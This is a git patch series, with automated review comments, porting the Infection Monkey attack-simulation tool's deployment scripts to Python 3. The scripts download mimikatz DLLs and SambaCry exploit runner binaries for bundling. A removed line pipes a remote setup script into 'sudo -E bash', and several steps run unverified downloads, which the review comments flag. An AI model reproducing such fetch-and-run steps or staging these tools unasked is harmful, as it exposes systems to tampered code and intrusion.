"^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", 
@@ -101,7 +101,7 @@
 "react-router-dom": "^4.3.1",
 "react-spinners": "^0.5.13",
 "react-table": "^6.10.3",
-"react-toggle": "^4.0.1",
+"react-toggle": "^4.1.1",
 "react-tooltip-lite": "^1.10.0",
 "redux": "^4.0.4",
 "sass-loader": "^7.3.1",
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt
index 57ca79348..a2e734324 100644
--- a/monkey/monkey_island/requirements.txt
+++ b/monkey/monkey_island/requirements.txt
@@ -13,7 +13,6 @@ Flask-JWT
 jsonschema
 netifaces
 ipaddress
-enum34
 pycryptodome
 bo​to3
 botocore
From 04d8f1341bd07e93e50d11b93454ff2c0649f887 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Thu, 3 Oct 2019 17:20:14 +0300
Subject: [PATCH 04/53] Fixed bug that caused PATH not to be refreshed after python installation

---
 deployment_scripts/deploy_windows.ps1 | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1
index c7192a4c8..87d6bc8cf 100644
--- a/deployment_scripts/deploy_windows.ps1
+++ b/deployment_scripts/deploy_windows.ps1
@@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 "Select 'add to PATH' when installing"
 $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
 Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
- $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
+ $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")
 Remove-Item $TEMP_PYTHON_INSTALLER
 # Check if installed correctly
 $version = cmd.exe /c '"python" --version 2>&1'
 if ( $version -like '* is not recognized*' ) {
- "Python is not found in PATH. If you just installed python you need to restart cmd.
- Else, add it manually or reinstall python."
+ "Python is not found in PATH. Add it to PATH and relaunch the script."
 return
 }
 }
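Review bot: The refreshed `$env:Path` now joins the Machine and User values, which fixes the detection, but the verification right below it keys on the English cmd.exe text `'* is not recognized*'`; on a localized Windows the message differs, the `-like` test is false, and the script proceeds as if Python were installed. A locale-independent probe avoids that: `if (-not (Get-Command python -ErrorAction SilentlyContinue)) { "Python is not found in PATH. Add it to PATH and relaunch the script."; return }`. The catch block this sits in, and the enclosing function, extend beyond the hunk.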
From 58ecb83977c1e87e04e4dad97a6187f5b41bf2db Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Mon, 7 Oct 2019 09:53:18 +0300
Subject: [PATCH 05/53] Added C++ redistributable required for windows and brought back UPX

---
 deployment_scripts/config.ps1 | 5 +++++
 deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++
 monkey/infection_monkey/build_windows.bat | 2 +-
 monkey/infection_monkey/monkey.spec | 1 +
 4 files changed, 26 insertions(+), 1 deletion(-)

diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1
index a3dafc66e..095f7b899 100644
--- a/deployment_scripts/config.ps1
+++ b/deployment_scripts/config.ps1
@@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip"
 $TEMP_PYTHON_INSTALLER = ".\python.exe"
 $TEMP_MONGODB_ZIP = ".\mongodb.zip"
 $TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
+$TEMP_CPP_INSTALLER = "cpp.exe"
 $TEMP_NPM_INSTALLER = "node.msi"
 $TEMP_PYWIN32_INSTALLER = "pywin32.exe"
+$TEMP_UPX_ZIP = "upx.zip"
+$UPX_FOLDER = "upx394w"
 
 # Other url's
 $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
 $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
+$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
 $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
 $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe"
 $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip"
 $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip"
+$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1
index 87d6bc8cf..0403185ff 100644
--- a/deployment_scripts/deploy_windows.ps1
+++ b/deployment_scripts/deploy_windows.ps1
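Review bot: `$CPP_URL` is a `go.microsoft.com/fwlink` redirector, so the bytes it resolves to are whatever is currently published behind LinkId 746572; the redistributable version can change underneath you and there is no recorded digest to verify against, yet deploy_windows.ps1 executes the result with `Start-Process`. I would pin the versioned download URL and record its SHA-256, or, since it is an Authenticode-signed Microsoft binary, have the deploy script insist on a `Valid` `Get-AuthenticodeSignature` status before running it. The re-added `$UPX_URL` is at least pinned to a release tag, but the extracted upx.exe is then run over the agent binary during packaging, so that zip deserves the same hash check.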
@@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 "Removing zip file"
 Remove-Item $TEMP_OPEN_SSL_ZIP
 
+ # Download and install C++ redistributable
+ "Downloading C++ redistributable ..."
+ $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER)
+ Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop
+ Remove-Item $TEMP_CPP_INSTALLER
+
 # Generate ssl certificate
 "Generating ssl certificate"
 Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR)
@@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
 New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
 
+ # Download upx
+ if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){
+ "Downloading upx ..."
+ $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
+ "Unzipping upx"
+ Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue
+ Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir
+ # Remove unnecessary files
+ Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)
+ "Removing zip file"
+ Remove-Item $TEMP_UPX_ZIP
+ }
+
 # Download mimikatz binaries
 $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
 if(!(Test-Path -Path $mk32_path )){
diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat
index e2bf2935e..f763bda6b 100644
--- a/monkey/infection_monkey/build_windows.bat
+++ b/monkey/infection_monkey/build_windows.bat
@@ -1 +1 @@
-pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec
+pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec
diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec
index e35fd2630..9c5fa9a18 100644
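Review bot: `Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop` executes the freshly downloaded redistributable with no check that the file is what was expected, and because the download goes through a redirector there is not even a stable version to reason about; gate the launch on the signature, e.g. `if ((Get-AuthenticodeSignature $TEMP_CPP_INSTALLER).Status -ne 'Valid') { throw "C++ redistributable is not validly signed" }`. The installer is also started interactively; the VC++ redistributable accepts `-ArgumentList '/install','/quiet','/norestart'` for unattended runs, which keeps this script non-blocking. The enclosing function extends beyond the hunk.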
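Review bot: `Expand-Archive $TEMP_UPX_ZIP ... -ErrorAction SilentlyContinue` swallows an extraction failure (truncated or corrupt zip, a pre-existing file), after which the script proceeds to `Move-Item` on a path that may not exist, so the only symptom is a confusing Move-Item error and a build that later fails in PyInstaller's `--upx-dir` step. Let Expand-Archive fail (`-ErrorAction Stop`) and check the zip's SHA-256 against a value pinned in config.ps1 before extracting, since the resulting upx.exe is run over the agent binary during packaging. This block is inside Deploy-Windows, which continues outside the hunk.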
--- a/monkey/infection_monkey/monkey.spec
+++ b/monkey/infection_monkey/monkey.spec
@@ -38,6 +38,7 @@ def main():
 debug=False,
 strip=get_exe_strip(),
 upx=True,
+ upx_exclude=['vcruntime140.dll'],
 console=True,
 icon=get_exe_icon())
 
From 2d8caddd7b0c0dfa281554c5d89db6515ff250cf Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Mon, 7 Oct 2019 16:24:15 +0300
Subject: [PATCH 06/53] Automatically adds python scripts to path so user could use pyinstaller off the bat

---
 deployment_scripts/deploy_windows.ps1 | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1
index 0403185ff..5a21c4daa 100644
--- a/deployment_scripts/deploy_windows.ps1
+++ b/deployment_scripts/deploy_windows.ps1
@@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 }
 
 "Installing python packages for island"
- $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
+ $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
 & python -m pip install --user -r $islandRequirements
 "Installing python packages for monkey"
 $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
 & python -m pip install --user -r $monkeyRequirements
 
+ $user_python_dir = cmd.exe /c 'py -m site --user-site'
+ $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts"
+ if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){
+ "Adding python scripts path to user's env"
+ $env:Path += ";"+$user_python_dir
+ [Environment]::SetEnvironmentVariable("Path",$env:Path,"User")
+ }
+
 # Download mongodb
 if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){
 "Downloading mongodb ..."
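Review bot: `[Environment]::SetEnvironmentVariable("Path",$env:Path,"User")` persists the entire process PATH — which Windows assembles from the Machine and User values, and which this script itself rebuilds that way after installing Python — into the user-scoped variable, so every machine-level entry is copied into the user's PATH and the value grows on each run; write back only the user value, `$userPath = [Environment]::GetEnvironmentVariable("Path","User"); [Environment]::SetEnvironmentVariable("Path", ($userPath.TrimEnd(';') + ";" + $user_python_dir), "User")`, and keep the `$env:Path +=` line for the current session. The lookup also shells out to `py -m site --user-site` while the rest of the script invokes `python`; if the `py` launcher is missing or resolves to a different interpreter, the Scripts directory added here belongs to the wrong installation, so `python -m site --user-site` keeps it consistent. The enclosing function extends beyond the hunk.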
From 7f009da96853be2422f939c53a71732d28580bc1 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Wed, 9 Oct 2019 11:23:20 +0300
Subject: [PATCH 07/53] Linux dev. env. deployment altered to support py3

---
 deployment_scripts/config | 6 ++
 deployment_scripts/deploy_linux.sh | 70 ++++++++++++-------
 .../infection_monkey/requirements_linux.txt | 4 +-
 monkey/monkey_island/linux/install_mongo.sh | 3 +-
 monkey/monkey_island/linux/run.sh | 16 ++++-
 monkey/monkey_island/requirements.txt | 1 -
 6 files changed, 68 insertions(+), 32 deletions(-)

diff --git a/deployment_scripts/config b/deployment_scripts/config
index bb10ed105..fb7a3d5b6 100644
--- a/deployment_scripts/config
+++ b/deployment_scripts/config
@@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
 WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
 WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
 
+# Other binaries for monkey
+TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64"
+TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32"
+SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so"
+SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so"
+
 # Mongo url's
 MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
 MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh
index 4df8ba114..136e3f8b1 100644
--- a/deployment_scripts/deploy_linux.sh
+++ b/deployment_scripts/deploy_linux.sh
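Review bot: The four new URLs fetch prebuilt native binaries (two traceroute executables and the two `.so` runners the Samba exploit pushes to targets) from a release tag with no checksum recorded anywhere, and they are presumably placed under the new `MONKEY_BIN_DIR` for monkey.spec's `get_sc_binaries`/`get_traceroute_binaries` to bundle, so a tampered release asset would ship inside every agent. Add a `*_SHA256` per binary next to each URL and verify with `sha256sum -c` after download, failing through `handle_error`. The naming follows the existing `*_BINARY_URL` convention, which is fine.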
@@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" 
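Review bot: The interpreter probe in the second hunk tries `python`, `python37` and `python3.7` but never `python3`, so a host whose default `python3` is already 3.7 falls straight through to `sudo add-apt-repository ppa:deadsnakes/ppa`. Adding a third-party PPA changes the host's trusted package sources and deserves at least a log line and a confirmation, and a fourth probe avoids it in the common case: `if [[ $(python3 --version 2>&1) == *"Python 3.7"* ]]; then python_cmd="python3"; fi`. Further down, `${python_cmd} -m pip install pip` only works if pip is already importable by the selected interpreter, whereas `apt install python3-pip` targets the distro's default python3, which is not necessarily `python_cmd`; guard that line with `|| handle_error` as the island requirements line already is.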
@@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl 
@@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt 
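Review bot: `npm update` now runs right after `sudo apt-get install npm` and before `cd "$ISLAND_PATH/cc/ui"`, so it updates whatever directory the script happens to be in rather than the UI project; move it back below the `cd`, or run `npm --prefix "$ISLAND_PATH/cc/ui" update`. The four `wget -c -N -P ${MONKEY_BIN_DIR} …` lines fetch shared objects and traceroute binaries that end up bundled into the agent with no integrity check and no `|| handle_error`; a `sha256sum -c` against recorded digests (`<expected-sha256 placeholder>`) after each download would catch a truncated or substituted file. `mkdir ${MONKEY_BIN_DIR}` without `-p` errors on every rerun, and `python-dev` is the Python 2 header package, so `python3.7-dev` is presumably what the `${python_cmd}` builds need. The log text `Downloading tracerout binaries` has a typo (traceroute).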
+++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file 
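Review bot: Removing the pin on `psutil==3.4.2` leaves it floating like the rest of this file, so two builds of the agent can pick up different psutil releases with no record of which one was tested. If 3.4.2 was dropped only because it does not build on Python 3.7, pin the release that was actually verified (`psutil==<tested-version placeholder>`) rather than none at all.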
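Review bot: `./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db` runs mongod in the foreground, so `${python_cmd} monkey_island.py` on the next line is not reached until mongod exits. Start it detached (`--fork --logpath <log path placeholder>`) or background it with `&`, and give the island a moment to connect before launching. When none of the three probes matches, `python_cmd` is empty and the last line tries to execute `monkey_island.py` itself; fail early instead with `[[ -z ${python_cmd} ]] && { echo "Python 3.7 not found"; exit 1; }`. The relative paths also rely on the caller's working directory being `monkey_island`, which the removed `cd /var/monkey` used to control; `cd "$(dirname "$0")/.."` at the top of the script would pin it.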
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index a2e734324..c887b8527 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From df7a43127a72d9ccb028f5bd246295540924218d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 08/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" 
@@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") 
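Review bot: `$version -like 'Python 3.*'` in the deploy_windows.ps1 hunk accepts any pre-existing Python 3 interpreter, although the installer this commit pins in config.ps1 is 3.7.4 and the Linux script on this branch insists on `Python 3.7`. If the requirements really need 3.7, tighten the check to `'Python 3.7.*'` and update the two messages to match, so an older 3.x found before the install does not pass silently. Deploy-Windows begins and ends outside the hunk.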
@@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 1c880a76d9556a0561d45153eeb42d004f645516 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 09/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 ++++++-------- deployment_scripts/deploy_windows.ps1 | 35 ++++++--------------------- monkey/infection_monkey/monkey.spec | 12 +-------- 3 files changed, 15 insertions(+), 50 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 
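Review bot: Only the message changed here, but the following two lines still download and run `$VC_FOR_PYTHON27_URL` / `$TEMP_VC_FOR_PYTHON27_INSTALLER`, and config.ps1 in this same commit deletes both definitions, so `$webClient.DownloadFile($null, $null)` throws and Deploy-Windows stops at this step on a fresh run. The Visual C++ Compiler for Python 2.7 has no Python 3 counterpart, so the whole block (comment, message, download, `Start-Process`, PATH refresh and `Remove-Item`) should go rather than be relabelled. Deploy-Windows begins and ends outside the hunk.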
